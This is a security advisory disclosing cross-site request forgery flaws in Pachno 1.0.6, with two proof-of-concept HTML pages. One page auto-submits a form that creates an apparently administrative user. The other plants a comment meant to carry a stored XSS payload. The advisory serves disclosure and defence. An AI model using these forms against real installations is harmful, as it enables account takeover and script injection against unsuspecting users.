Pachno 1.0.6 Cross-Site Request Forgery


Vendor: Daniel André Eikeland
Product web page: https://github.com/pachno/pachno
Affected version: 1.0.6

Summary: Pachno is an open-source collaboration platform (formerly known as The Bug Genie)
designed for team project management, issue tracking, and documentation. It offers a module-based,
customizable environment for software development and team workflows, distributed under the
Mozilla Public License.

Desc: CSRF protection in the application is opt-in via the @CsrfProtected annotation and the
csrf_enabled route flag, both of which are absent from a large set of state-changing endpoints
including login, registration, logout, file upload, milestone editing, group/role/team/client/user
administration, and Livelink commit posting. No same-origin enforcement, anti-CSRF token, or
SameSite=Strict cookie attribute is in place to compensate. This can be exploited to perform
arbitrary actions in context of an authenticated user, including forced logout, account creation
by an admin, role modification, comment injection, and file upload. This can be exploited to
perform certain actions with administrative privileges if a logged-in user visits a malicious
web site.

Tested on: GNU/Linux
           Apache2
           PHP/7.4
           MySQL/5.7 (MariaDB)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2026-5983
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5983


06.04.2026

--


CSRF Add Admin:
---------------
<html>
<body onload="document.forms[0].submit();">
<form method="POST" action="http://127.0.0.1/configure/users">
  <input type="hidden" name="username" value="testingus" />
  <input type="hidden" name="password" value="pwd123" />
  <input type="hidden" name="password_repeat" value="pwd123" />
  <input type="hidden" name="email" value="lab@zeroscience.mk" />
  <input type="hidden" name="realname" value="ZSL" />
  <input type="hidden" name="group_id" value="1" />
</form>
</body>
</html>


CSRF Script Injection (Stored XSS):
-----------------------------------
<html>
<body>
<form id="csrf" method="POST" action="http://127.0.0.1/project/issues/17/comment">
  <input name="comment_body" value="IMPORTANTE: XSS Payload Here!" />
  <input name="comment_applies_type" value="1" />
  <input name="comment_applies_id" value="17" />
  <input name="comment_module" value="core" />
  <input name="comment_visibility" value="1" />
  <input name="comment_body_syntax" value="0" />
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>